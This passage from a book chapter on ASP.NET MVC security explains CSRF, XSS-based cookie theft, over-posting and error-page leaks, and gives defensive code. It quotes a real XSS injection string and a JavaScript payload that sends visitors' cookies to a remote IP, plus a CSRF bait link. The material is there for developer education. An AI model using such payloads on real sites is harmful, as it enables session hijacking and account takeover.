The image in the comment (with the CSRF link) will just be rendered as a broken red X, and most people will think it's just a bad avatar or emoticon. What it really is is a remote call to a page that uses GET to run an action on a server — a confused deputy attack that nets you some cold cash. It just so happens that the browser in question is Perfect Victim's browser — so it isn't traceable to you (assuming that you've covered your behind with respect to fake accounts in the Bahamas, etc.). This is almost the perfect crime!

This attack isn't restricted to simple image tag/GET request trickery; it extends well into the realm of spammers who send out fake links to people in an effort to get them to click to go to their site (as with most bot attacks). The goal with this kind of attack is to get users to click the link, and when they land on the site, a hidden IFRAME or bit of script auto-submits a form (using HTTP POST) off to a bank, trying to make a transfer. If you're a Widely Used Bank customer and have just been there, this attack will work.

Revisiting the previous forum post social engineering trickery — it only takes one additional post to make this latter attack successful:

Wow! And did you know that your Savings account number adds up to 50! This is so weird — read this news release about it:

<a href="http://badnastycsrfsite.example.com">CNN.com</a>It's really weird!

Clearly, you don't even need to use XSS here. You can just plant the URL and hope that someone is clueless enough to fall for the bait (going to their Widely Used Bank account and then heading to your fake page at http://badnastycsrfsite.example.com).

You might be thinking that this kind of thing should be solved by the Framework — and it is! ASP.NET MVC puts the power in your hands, so perhaps a better way of thinking about this is that ASP.NET MVC should enable you to do the right thing, and indeed it does!

ASP.NET MVC includes a nice way of preventing CSRF attacks, and it works on the principle of verifying that the user who submitted the data to your site did so willingly. The simplest way to do this is to embed a hidden input into each form request that contains a unique value. You can do this with the HTML Helpers by including this in every form:

<form action="/account/register" method="post">

<%=Html.AntiForgeryToken()%>

...

</form>

Code snippet 9-11.txt

Html.AntiForgeryToken will output an encrypted value as a hidden input:

<input type="hidden" name="__RequestVerificationToken" value="012837udny31w90hjhf7u">

Code snippet 9-12.txt

This value will match another value that is stored as a session cookie in the user's browser. When the form is posted, these values will be matched using an ActionFilter:

[ValidateAntiForgeryToken]

public ActionResult Register(...)

Code snippet 9-13.txt

This will handle most CSRF attacks, but not all of them. In the last example above, you saw how users can be registered automatically to your site. The anti-forgery token approach will take out most CSRF-based attacks on your Register method, but it won't stop the bots out there that seek to auto-register (and then spam) users to your site. We'll talk about ways to limit this kind of thing later in the chapter.
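The matching idea behind the token can be sketched in a few lines of plain C#. This is a conceptual illustration only, not how ASP.NET MVC implements its anti-forgery token internally. The class and method names are hypothetical, and the cookie and form values are simulated with local strings.

```csharp
using System;
using System.Security.Cryptography;

public static class TokenMatchDemo
{
    // Creates an unpredictable token. In a real request cycle the same value
    // would be written to a cookie and to the hidden form field.
    public static string CreateToken()
    {
        byte[] bytes = new byte[32];
        using (RandomNumberGenerator rng = RandomNumberGenerator.Create())
        {
            rng.GetBytes(bytes);
        }
        return Convert.ToBase64String(bytes);
    }

    // Compares the two values without stopping at the first mismatched character.
    public static bool TokensMatch(string cookieToken, string formToken)
    {
        if (cookieToken == null || formToken == null || cookieToken.Length != formToken.Length)
        {
            return false;
        }

        int diff = 0;
        for (int i = 0; i < cookieToken.Length; i++)
        {
            diff |= cookieToken[i] ^ formToken[i];
        }
        return diff == 0;
    }

    public static void Main()
    {
        string token = CreateToken();

        // A legitimate post carries the same value in both places.
        Console.WriteLine(TokensMatch(token, token));

        // A forged post has to guess the form value, and the guess will not match.
        Console.WriteLine(TokensMatch(token, CreateToken()));
    }
}
```

A page on another site can make the victim's browser send the cookie, but it cannot read the cookie to copy its value into the forged form, which is why the comparison fails.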

Idempotent is a big word, for sure, but it's a simple concept. If an operation is idempotent, it can be executed multiple times without changing the result. In general, a good rule of thumb is that you can prevent a whole class of CSRF attacks by only changing things in your DB or on your site by using POST, and keeping GET requests idempotent. This means Registration, Logout, Login, and so forth. At the very least, this limits the confused deputy attacks somewhat.
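Applied to the Logout action from earlier, the rule of thumb might look like the following sketch. It assumes ASP.NET MVC 2 or later for the `[HttpPost]` attribute (MVC 1 would use `[AcceptVerbs(HttpVerbs.Post)]`), and it calls `FormsAuthentication.SignOut()` directly instead of the `FormsAuth` wrapper used in the chapter's sample.

```csharp
using System.Web.Mvc;
using System.Web.Security;

public class AccountController : Controller
{
    // Only POST requests reach this action, so an <img> tag,
    // which always issues a GET, can no longer log the user out.
    [HttpPost]
    public ActionResult Logout()
    {
        FormsAuthentication.SignOut();
        return RedirectToAction("Index", "Home");
    }
}
```

The logout link in the view then has to become a small form with a submit button. Adding the anti-forgery token to that form would also cover forged POSTs.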

HttpReferrer validation can be handled using an ActionFilter (see Chapter 8), wherein you check to see if the client that posted the form values was indeed your site:

public class IsPostedFromThisSiteAttribute : AuthorizeAttribute

{

public override void OnAuthorization(AuthorizationContext filterContext)

{

if (filterContext.HttpContext != null)

{

if (filterContext.HttpContext.Request.UrlReferrer == null)

throw new System.Web.HttpException("Invalid submission");

if (filterContext.HttpContext.Request.UrlReferrer.Host !=

"mysite.com")

throw new System.Web.HttpException

("This form wasn't submitted from this site!");

}

}

}

Code snippet 9-14.txt

You can then use this filter on the Register method, like so:

[IsPostedFromThisSite]

public ActionResult Register(...)

As you can see, there are different ways of handling this, which is the point of MVC. It's up to you to know what the alternatives are and to pick one that works for you and your site.

The following section discusses cookie stealing, what it means to you and how to prevent it.

Cookies are one of the things that make the Web usable. Without them, life becomes login box after login box. You can disable cookies on your browser to minimize the theft of your particular cookie (for a given site), but chances are you'll get a snarky warning that "Cookies must be enabled to access this site."

There are two types of cookies: session cookies and persistent cookies.

The main difference is that session cookies are forgotten when your session ends — persistent cookies are not, and a site will remember you the next time you come along.

If you could manage to steal someone's authentication cookie for a website, you could effectively assume their identity and carry out all the actions that they are capable of. This type of exploit is actually very easy, but it relies on an XSS vulnerability. The attacker must be able to inject a bit of script onto the target site in order to steal the cookie.

Jeff Atwood of CodingHorror.com wrote about this issue recently as StackOverflow.com was going through beta:

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page:

<img src=""http://www.a.com/a.jpg<script type=text/javascript

src="http://1.2.3.4:81/xss.js">" /><<img

src=""http://www.a.com/a.jpg</script>"

Code snippet 9-15.txt

StackOverflow.com allows a certain amount of HTML in the comments, something that is incredibly tantalizing to an XSS hacker. The example that Jeff offered on his blog is a perfect illustration of how an attacker might inject a bit of script into an innocent-appearing ability such as adding a screen-shot image.

Jeff used a whitelist type of XSS prevention — something he wrote on his own (his "friend" in the post is a Tyler Durden-esque reference to himself). The attacker, in this case, exploited a hole in Jeff's homegrown HTML sanitizer:

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:

window.location="http://1.2.3.4:81/r.php?u=" +document.links[1].text +"&l="+document.links[1] +"&c="+document.cookie;

That's right — whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!

In short order, the attacker managed to steal the cookies of the StackOverflow.com users, and eventually Jeff's as well. This allowed the attacker to log in and assume Jeff's identity on the site (which was still in beta) and effectively do whatever he felt like doing. A very clever hack, indeed.

The StackOverflow.com attack was facilitated by two things:

XSS Vulnerability: Jeff insisted on writing his own anti-XSS code. Generally, this is not a good idea, and you should rely on things like BB Code or other ways of allowing your users to format their input. In this case, Jeff opened an XSS hole.

Cookie Vulnerability: The StackOverflow.com cookies were not set to disallow access from script running in the client's browser.

You can stop script access to cookies by adding a simple flag: HttpOnly. You can set this on an individual cookie in code like so:

Response.Cookies["MyCookie"].Value="Remembering you...";

Response.Cookies["MyCookie"].HttpOnly=true;

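Code snippet 9-16.txt

Setting this flag tells the browser to keep the cookie out of reach of client-side script (document.cookie, for example) while still sending it to the server with each request. This is fairly straightforward, and it will stop most XSS-based cookie theft, believe it or not. To apply the flag to every cookie the site issues, you can set httpOnlyCookies="true" on the <httpCookies> element in web.config.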

The following section discusses over-posting, what it means to you and how to prevent it.

ASP.NET Model Binding can present another attack vector through over-posting. Let's look at an example with a store product page that allows users to post review comments:

public class Review {

public int ReviewID { get; set; } // Primary key

public int ProductID { get; set; } // Foreign key

public Product Product { get; set; } // Foreign entity

public string Name { get; set; }

public string Comment { get; set; }

public bool Approved { get; set; }

}

Code snippet 9-17.txt

We have a simple form with the only two fields we want to expose to a reviewer, Name and Comment:

Name: <%= Html.TextBox("Name") %><br>

Comment: <%= Html.TextBox("Comment") %>

Code snippet 9-18.txt

Since we've only exposed Name and Comment on the form, we might not be expecting that a user could approve his or her own comment. However, a malicious user can easily meddle with the form post using any number of web developer tools, adding "Approved=true". The model binder has no idea what fields you've included on your form and will happily set the Approved property to true.

What's even worse, since our Review class has a Product property, a hacker could try posting values in fields with names like "Product.Price", potentially altering values in a table we never expected end users could edit.

The simplest way to prevent this is to use the [Bind] attribute to explicitly control which properties we want the Model Binder to bind to. BindAttribute can be placed on either the Model class or the Controller action parameter. We can use a whitelist approach, which specifies all the fields we'll allow binding to, as in [Bind(Include="Name, Comment")], or we can exclude the fields we don't want bound using a blacklist like [Bind(Exclude="ReviewID, ProductID, Product, Approved")]. Generally a whitelist is a lot safer, because it's a lot easier to make sure you just list the properties you want bound than to enumerate all the properties you don't want bound.
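To make the problem and the whitelist fix concrete without running a web project, here is a toy binder in plain C#. It is only a stand-in for the idea and does not reproduce how the MVC model binder works. `ToyBinder`, `OverPostingDemo`, and the trimmed-down `Review` class are hypothetical names used for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;

// Trimmed copy of the Review model, kept small for the demo.
public class Review
{
    public string Name { get; set; }
    public string Comment { get; set; }
    public bool Approved { get; set; }
}

public static class ToyBinder
{
    // Copies posted values onto matching properties. When include names are
    // supplied, only those properties are bound (a whitelist).
    public static void Bind(object model, IDictionary<string, string> form, params string[] include)
    {
        foreach (KeyValuePair<string, string> field in form)
        {
            if (include.Length > 0 && !include.Contains(field.Key, StringComparer.OrdinalIgnoreCase))
            {
                continue; // not on the whitelist, so ignore it
            }

            PropertyInfo property = model.GetType().GetProperty(field.Key);
            if (property != null && property.CanWrite)
            {
                object value = Convert.ChangeType(field.Value, property.PropertyType);
                property.SetValue(model, value, null);
            }
        }
    }
}

public static class OverPostingDemo
{
    public static void Main()
    {
        // The attacker adds Approved=true to the two fields the form really has.
        var form = new Dictionary<string, string>
        {
            { "Name", "Mallory" }, { "Comment", "Great product" }, { "Approved", "true" }
        };

        var unprotected = new Review();
        ToyBinder.Bind(unprotected, form);
        Console.WriteLine(unprotected.Approved); // the extra field was bound

        var whitelisted = new Review();
        ToyBinder.Bind(whitelisted, form, "Name", "Comment");
        Console.WriteLine(whitelisted.Approved); // the extra field was ignored
    }
}
```

The whitelist version never looks at the Approved field, so adding new sensitive properties to the model later does not silently expose them.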

Here's how we'd annotate our Review class to only allow binding to the Name and Comment properties.

[Bind(Include="Name, Comment")]

public class Review {

public int ReviewID { get; set; } // Primary key

public int ProductID { get; set; } // Foreign key

public Product Product { get; set; } // Foreign entity

public string Name { get; set; }

public string Comment { get; set; }

public bool Approved { get; set; }

}

Code snippet 9-19.txt

A second alternative is to use one of the overloads on UpdateModel or TryUpdateModel that will accept a bind list, like the following:

UpdateModel(review, "Review", new string[] { "Name", "Comment" });

Code snippet 9-20.txt

Still another way to deal with over-posting is to avoid binding directly to the model. You can do this by using a ViewModel that holds only the properties you want to allow the user to set. The following ViewModel eliminates the over-posting problem:

public class ReviewViewModel {

public string Name { get; set; }

public string Comment { get; set; }

}

Code snippet 9-21.txt

Note

For more on the security implications of Model Validation, see ASP.NET team member Brad Wilson's post titled Input Validation vs. Model Validation in ASP.NET MVC at http://bradwilson.typepad.com/blog/2010/01/input-validation-vs-model-validation-in-aspnet-mvc.html.
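Returning to the ViewModel approach, the bound ViewModel still has to be copied onto the real entity somewhere. One way that step might look is sketched below in plain C#. `ReviewMapper`, its `ToReview` method, and the trimmed `Review` class are hypothetical, and the product id is assumed to come from the route rather than from the form.

```csharp
using System;

// Trimmed copy of the Review model, kept small for the demo.
public class Review
{
    public int ProductID { get; set; }
    public string Name { get; set; }
    public string Comment { get; set; }
    public bool Approved { get; set; }
}

public class ReviewViewModel
{
    public string Name { get; set; }
    public string Comment { get; set; }
}

public static class ReviewMapper
{
    // Builds the entity from the bound ViewModel. Server-controlled fields
    // are set here and never taken from the posted values.
    public static Review ToReview(ReviewViewModel posted, int productId)
    {
        return new Review
        {
            ProductID = productId,
            Name = posted.Name,
            Comment = posted.Comment,
            Approved = false // reviews always start unapproved
        };
    }

    public static void Main()
    {
        var posted = new ReviewViewModel { Name = "Mallory", Comment = "Great product" };
        Review review = ToReview(posted, 42);
        Console.WriteLine(review.Name + " / approved: " + review.Approved);
    }
}
```

Because the ViewModel has no Approved or Product property, there is nothing for a tampered form post to bind to.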

Something that happens quite often is that sites go into production with <customErrors mode="Off"> set in the web.config. This isn't specific to ASP.NET MVC, but it's worth bringing up in the security chapter because it happens all too often.

This setting is found in the web.config:

<!--

The <customErrors> section enables configuration

of what to do if/when an unhandled error occurs

during the execution of a request. Specifically,

it enables developers to configure html error pages

to be displayed in place of a error stack trace.

<customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">

<error statusCode="403" redirect="NoAccess.htm" />

<error statusCode="404" redirect="FileNotFound.htm" />

</customErrors>

-->

Code snippet 9-22.txt

There are three possible settings for the customErrors mode. On is the safest for production servers, since it will always hide error messages. RemoteOnly will show generic errors to most users, but will expose the full error messages to users with server access. The most vulnerable setting is Off, which will expose detailed error messages to anyone who visits your website.

Hackers can exploit this setting by forcing your site to fail — perhaps sending in bad information to a Controller using a malformed URL or tweaking the query string to send in a string when an integer is required.

It's tempting to temporarily turn off the Custom Errors feature when troubleshooting a problem on your production server, but if you leave Custom Errors disabled (mode="Off") and an exception occurs, the ASP.NET run time will show a "friendly" error message, which will also show the source code where the error happened. If someone was so inclined, they could steal a lot of your source and find (potentially) vulnerabilities that they could exploit in order to steal data or shut your application down.

This section is pretty short and serves only as a reminder to code defensively and leave the Custom Errors setting on!

With ASP.NET Web Forms, you were able to secure a directory on your site simply by locking it down in the web.config:

<location path="Admin" allowOverride="false">

<system.web>

<authorization>

<allow roles="Administrator" />

<deny users="?" />

</authorization>

</system.web>

</location>

Code snippet 9-23.txt

This works well on file-based web applications, but ASP.NET MVC is not file-based. As alluded to previously in Chapter 2, ASP.NET MVC is something of a remote procedure call system. In other words, each URL is a route, and each route maps to an Action on a Controller.

You can still use the system above to lock down a route, but invariably it will backfire on you as your routes grow with your application.

The simplest way to demand authentication for a given Action or Controller is to use the [Authorize] attribute. This tells ASP.NET MVC to use the authentication scheme set up in the web.config (FormsAuth, WindowsAuth, etc.) to verify who the user is and what they can do.

If all you want to do is to make sure that the user is authenticated, you can attribute your Controller or Action with [Authorize]:

[Authorize]

public class TopSecretController:Controller

Code snippet 9-24.txt

Adding this to your Controller will cause an HTTP 401 response to be sent to unauthenticated users. If you have Forms Authentication configured, the system will intercept this 401 response and redirect those users to the login page; users who have already authenticated are let through.

If you want to restrict access by roles, you can do that too:

[Authorize(Roles="Level3Clearance,Level4Clearance")]

public class TopSecretController:Controller

Code snippet 9-25.txt

... and you can also authorize by users:

[Authorize(Users="NinjaBob,Superman")]

public class TopSecretController:Controller

Code snippet 9-26.txt

It's worth mentioning once again that you can use the Authorize attribute on Controllers or Actions. For more information on the Authorize attribute, see the discussion in Chapter 8.
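The controller-level examples above lock down every action at once. As a sketch of the action-level alternative, the hypothetical `ReportsController` below leaves its listing open and restricts only the destructive action. The role name is an assumption for illustration.

```csharp
using System.Web.Mvc;

public class ReportsController : Controller
{
    // Anyone may list reports.
    public ActionResult Index()
    {
        return View();
    }

    // Only authenticated users in the Administrator role may delete.
    [Authorize(Roles = "Administrator")]
    public ActionResult Delete(int id)
    {
        // Deletion logic omitted in this sketch.
        return RedirectToAction("Index");
    }
}
```

Mixing open and restricted actions this way keeps the rule next to the code it protects, which tends to hold up better than path-based rules as routes change.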

Occasionally, you might need to create a method on your Controller that is public (for testing purposes, etc.). It's important to know that the ActionInvoker (the thing that calls the method that Routing has specified) doesn't determine if the Action is indeed an Action as intended by the developer.

This used to be the case in early releases of ASP.NET MVC, and you had to explicitly declare your Actions on your Controller:

[Action]

public void Index()...

Code snippet 9-27.txt

This didn't make sense to a lot of people because there are almost no good reasons to have a public method of a Controller that is not an Action, so an opt-out scenario was adopted, wherein you had to tag things that are not specifically Actions:

[NonAction]

public string GetSensitiveInformation()

Code snippet 9-28.txt

The main thing to keep in mind is that all public methods on your Controller are web-callable, and you can avoid problems if you keep methods as private or mark them with [NonAction].

We started the chapter off this way, and it's appropriate to end it this way: ASP.NET MVC gives you a lot of control and removes a lot of the abstraction that some developers considered an obstacle. With greater freedom comes greater power, and with greater power comes greater responsibility.

Microsoft is committed to helping you "fall into the pit of success" — meaning that the ASP.NET MVC team wants the right thing to be apparent and simple to develop. Not everyone's mind works the same way, however, and there will undoubtedly be times when the ASP.NET MVC team made a decision with the Framework that might not be congruent with the way you've typically done things. The good news is that when this happens, you will have a way to implement it your own way — which is the whole point of ASP.NET MVC.

Let's recap the threats and solutions to some common web security issues (shown in Table 9-1).

Table 9.1. ASP.NET Security

| THREAT | SOLUTIONS |
|---|---|
| | Educate yourself. Assume your applications will be hacked. Remember that it's important to protect user data. |
| Cross-Site Scripting (XSS) | HTML Encode all content. Encode attributes. Remember JavaScript encoding. Use AntiXSS if possible. |
| Cross-Site Request Forgery (CSRF) | Token Verification. Idempotent GETs. HttpReferrer Validation. |
| Over-Posting | Use the Bind attribute to explicitly whitelist or blacklist fields. |

ASP.NET MVC gives you the tools you need to keep your website secure, but it's up to you to apply them wisely. True security is an ongoing effort that requires you to monitor and adapt to an evolving threat. It's your responsibility, but you're not alone. There are plenty of great resources both in the Microsoft web development sphere and in the Internet security world at large. Table 9-2 lists some resources to get you started.

Table 9.2. Security Resources

| RESOURCE | URL |
|---|---|
| Book: Beginning ASP.NET Security (Barry Dorrans) | |
| Microsoft Information Security Team (makers of AntiXSS and CAT.NET) | |

Security issues in web applications invariably come down to very simple issues on the developer's part: bad assumptions, misinformation, and lack of education. In this chapter, we did our best to tell you about the enemy out there. We'd like to end this on a happy note, but there are no happy endings when it comes to Internet security — there is always another Kevin Mitnick out there, using their amazing genius for evil purposes. They will find a way around the defenses, and the war will continue.

The best way to keep yourself protected is to know your enemy and know yourself. Get educated and get ready for battle.